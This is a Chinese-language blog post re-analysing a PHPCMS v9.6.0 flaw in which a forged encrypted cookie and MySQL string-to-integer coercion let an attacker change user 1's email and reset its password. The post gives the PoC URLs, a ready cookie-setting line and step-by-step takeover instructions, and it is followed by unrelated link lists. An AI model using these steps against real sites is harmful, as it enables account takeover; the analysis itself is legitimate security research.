参考来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0173130.html

他分析的好像不对。我用我的在分析一次。

先来看poc:

/index.php?m=member&c=index&a=send_newmail&siteid=1&newemail=aa222a@qq.com

根据phpcms的框架,定位到源码地址

/phpcms/modules/member/index.php   第267到312行

    public function send_newmail() {

        $_username = param::get_cookie('_regusername');

        $_userid = param::get_cookie('_reguserid');

        $_ssouid = param::get_cookie('_reguseruid');

        $newemail = $_GET['newemail'];

        if($newemail==''){//邮箱为空,直接返回错误

            return '2';

        }

        $this->_init_phpsso();

        $status = $this->client->ps_checkemail($newemail);

        if($status=='-5'){//邮箱被占用

            exit('-1');

        }

        if ($status==-1) {

            $status = $this->client->ps_get_member_info($newemail, 3);

            if($status) {

                $status = unserialize($status);	//接口返回序列化,进行判断

                if (!isset($status['uid']) || $status['uid'] != intval($_ssouid)) {

                    exit('-1');

                }

            } else {

                exit('-1');

            }

        }

        //验证邮箱格式

        pc_base::load_sys_func('mail');

        $code = sys_auth($_userid.'|'.microtime(true), 'ENCODE', get_auth_key('email'));

        $url = APP_PATH."index.php?m=member&c=index&a=register&code=$code&verify=1";

        //读取配置获取验证信息

        $member_setting = getcache('member_setting');

        $message = $member_setting['registerverifymessage'];

        $message = str_replace(array('{click}','{url}','{username}','{email}','{password}'), array('<a href="'.$url.'">'.L('please_click').'</a>',$url,$_username,$newemail,$password), $message);

        if(sendmail($newemail, L('reg_verify_email'), $message)){

            //更新新的邮箱,用来验证

            $this->db->update(array('email'=>$newemail), array('userid'=>$_userid));

            $this->client->ps_member_edit($_username, $newemail, '', '', $_ssouid);

            $return = '1';

        }else{

            $return = '2';

        }

        echo $return;

    }

  $_userid用 param::get_cookie('_reguserid') 来获取

跟进去:/phpv9.6.0/phpcms/libs/classes/param.class.php  第106-117行。

	public static function get_cookie($var, $default = '') {

		$var = pc_base::load_config('system','cookie_pre').$var;

		$value = isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE') : $default;

		if(in_array($var,array('_userid','userid','siteid','_groupid','_roleid'))) {

			$value = intval($value);

		} elseif(in_array($var,array('_username','username','_nickname','admin_username','sys_lang'))) { //  site_model auth

			$value = safe_replace($value);

		}

		return $value;

	}

  这时候的$var的值是_reguserid, 然后获取前缀。pc_base::load_config('system','cookie_pre')

  $var的值就变成了gggCB__reguserid,然后进到sys_auth($_COOKIE[$var], 'DECODE'),由于这个值我们是可控的,那找个可控的地方加密一下,也就是注册的时候,把名字注册成1xxxx(为什么是这样的后面会说) ,然后他会对username进行加密,我们只要注册一个号,然后复制出里面username的值就行。

接着有个if判断,这就是我说文章分析错的地方,这里的$var的值是gggCB__reguserid,根本不在后面的这个数组里面,所以进入不到$value = intval($value);

所以不能intval出数字来,所以文章分析错了,但是还是能密码重置。接着看,返回了$value的值,也就是1xxxx。

省略中间的运行:来到304行,看这句

$this->db->update(array('email'=>$newemail), array('userid'=>$_userid));

进行update操作,$newemail的值是我们给的,$_userid是 1xxxx 。

跟进去形成sql修改。语句是这样的。

UPDATE `phpcms`.`v9_member` SET `email`='aa223d@qq.com' WHERE `userid` = '1xxxx'

然后在mysql中,where  1 = '1sFdsfdsf'  是相等的,因为后面的字符串转为了数组1

所以他的语句就变成了

UPDATE `phpcms`.`v9_member` SET `email`='aa223d@qq.com' WHERE `userid` = '1'

然后重置掉了用户userid为1 的用户

大概的攻击流程是这样的。

注册一个1xxx ,然后获取cookie中的username的值,然后切换一个浏览器,再次打开网页,在f12中,设置cookie的值,注意__reguserid前面的gggCB也要和username的值一样

document.cookie='gggCB__reguserid=2f22C0FxoGesxWq73GqUXpuJBDAAEO_KZL5MuEDDeaEj9w'

然后访问 /index.php?m=member&c=index&a=send_newmail&siteid=1&newemail=q123456@qq.com

看到页面返回1就代表成功了,然后就去

/index.php?m=member&c=index&a=public_forget_password&siteid=1

输入你的邮箱 重置掉userid=1的密码。

PHPCMS v9.6.0 任意用户密码重置的更多相关文章

  1. phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)

    phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) 一.漏洞描述 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞 ...

  2. zzcms8.2#任意用户密码重置#del.php时间盲注#复现

    00x0 引言 早上起来,发现seebug更新了一批新的洞, 发现zzcms8.2这个洞好多人在挖,于是我就默默的踏上了复现之路(要不是点进去要买详情,我何必这么折腾~) 环境:zzcms8.2(产品 ...

  3. 代码审计-DedeCMS-V5.7前台任意用户密码重置

    0x01 漏洞影响 该漏洞允许攻击者修改任意前台用户密码. 0x02 漏洞利用条件 1,开启会员模块 2,攻击者拥有一个正常的会员账号 3,目标没有设置安全问题 0x03 漏洞分析 漏洞文件:/mem ...

  4. phpcms v9.6.0任意文件上传漏洞

    距离上一次写博客已经过去很长一段时间了,最近也一直在学习,只是并没有分享出来  越来越发现会的东西真的太少了,继续努力吧. 中午的时候遇到了一个站点,看到群里好多人都在搞,自己就也去试了试,拿下来后发 ...

  5. 任意用户密码重置的十种姿势=====>学习笔记!

    原学习视频链接:https://www.butian.net/School/content?id=214%E2%80%98 1.验证码不失效 原因:获取的验证码缺少时间限制,仅判断验证码是否不正确而未 ...

  6. Dbshop v1.3任意用户密码重置漏洞

    0x00 前言 年也过的差不多了,各自也都回到岗位忙碌起来了,新的一年祝大家诸事顺利,洞洞高危!好了进入正题 0x01 漏洞简介 本次主要写个简单的逻辑漏洞!然后抛个Message 内置高危. 1.找 ...

  7. PHPCMS v9.6.0 任意文件上传漏洞分析

    引用源:http://paper.seebug.org/273/ 配置了php debug的环境,并且根据这篇文章把流程走了一遍,对phpstorm的debug熟练度+1(跟pycharm一样) 用户 ...

  8. ZZCMS8.2 用户密码重置漏洞

    前言 一个找回密码处的逻辑漏洞, 还是有点意思的. 正文 首先是定位找回密码功能对应的代码位置,使用找回密码的功能,然后抓包即可 下面去 getpassword.php 里面看看, 首先包含了一些文件 ...

  9. 【漏洞分析】dedecms有前提前台任意用户密码修改

     0x00 前言 早上浏览sec-news,发现锦行信息安全发布了一篇文章<[漏洞分析] 织梦前台任意用户密码修改>,看完之后就想着自己复现一下. 该漏洞的精髓是php的弱类型比较,'0. ...

随机推荐

  1. 一周Maven框架学习随笔

    第一次写博客,可能写得不是很好,但是希望自己持之以恒,以后会更好.也希望通过写博客记录随笔,让自己本身有所收获. 下面是今天的maven总结: maven个人理解中是Maven项目对象模型(POM), ...

  2. JavaWeb学习笔记三 Servlet

    Servlet 是运行在服务端的Java小程序,是sun公司提供一套规范(接口),用来处理客户端请求.响应给浏览器的动态资源.但servlet的实质就是java代码,通过java的API,动态的向客户 ...

  3. 1013团队alpha冲刺日志集合帖

    alpha冲刺day1 alpha冲刺day2 alpha冲刺day3 alpha冲刺day4 alpha冲刺day5 alpha冲刺day6 alpha冲刺day7 alpha冲刺day8 alph ...

  4. tornado 采用 epoll 代理构建高并发网络模型

    1 阻塞和非阻塞  对于阻塞和非阻塞,网上有一个很形象的比喻,就是说好比你在等快递,阻塞模式就是快递如果不到,你就不能做其他事情.非阻塞模式就是在这段时间里面,你可以做其他事情,比如上网.打游戏.睡觉 ...

  5. 构建微服务开发环境4————安装Docker及下载常用镜像

    [内容指引] 下载Docker: Mac下安装Docker: Windows下安装Docker; 下载常用docker镜像. 一.下载Docker 1.Mac适用Docker下载地址:https:// ...

  6. 数据故障的恢复-MSSQL ndf文件大小变为0 KB恢复过程

    一.故障描述 成都某客户,存储损坏,数据库崩溃.重组存储,恢复数据库文件,发现有四个ndf文件大小变为0 KB.数据库大小约80TB.数据库中有1223个文件,数据库每10天生成一个NDF文件,每个N ...

  7. 《javascript设计模式与开发实践》阅读笔记(13)—— 职责链模式

    职责链模式 使多个对象都有机会处理请求,从而避免请求的发送者和接收者之间的耦合关系,将这些对象连成一条链,并沿着这条链传递该请求,直到有一个对象处理它为止. 书里的订单的例子 假设我们负责一个售卖手机 ...

  8. aws - shadow 影子使用

    参考链接: https://github.com/aws/aws-iot-device-sdk-java 一.设备注册 二.设备主题

  9. maven常见问题处理(3-4)配置代理服务器

    有的公司基于安全因素考虑,要求员工使用通过安全认证的代理访问因特网. 这时就需要为Maven配置HTTP代理. 在目录~/.m2/setting.xml文件中编辑如下(如果没有该文件,则复制$M2_H ...

  10. 修改hosts 流畅使用coursera

    以管理员权限打开 C盘 ->  Windows-> System32 -> drives -> etc -> hosts文件 在hosts文件最后写入 52.84.246 ...